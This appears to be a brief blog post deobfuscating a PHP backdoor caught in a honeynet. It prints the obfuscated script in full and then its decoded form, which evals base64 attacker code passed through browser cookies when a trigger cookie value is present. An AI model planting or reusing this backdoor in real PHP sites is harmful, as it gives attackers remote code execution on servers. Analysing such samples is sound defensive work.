One of my botnet eh honeynet managed to caught up this nifty PHP script.
It's pretty much straight forward just by having a glance on it.
$kisg = is actually string_replace
$gsqn = base64_decode
$zuzt = create_function
Cleaning this bad ware stuff will give us
Final Output:
Conclusion? The author of this backdoor must be romantic..
$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19"; $kisg = str_replace("ar","","sartarrar_rarearparlaracare"); $ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL"; $ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9"; $dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof"; $gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode"); $zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion"); $lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?>
It's pretty much straight forward just by having a glance on it.
$kisg = is actually string_replace
$gsqn = base64_decode
$zuzt = create_function
Cleaning this bad ware stuff will give us
$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));
Final Output:
$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='il' && $c($a)>3){$k='oveyou';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})
No comments:
Post a Comment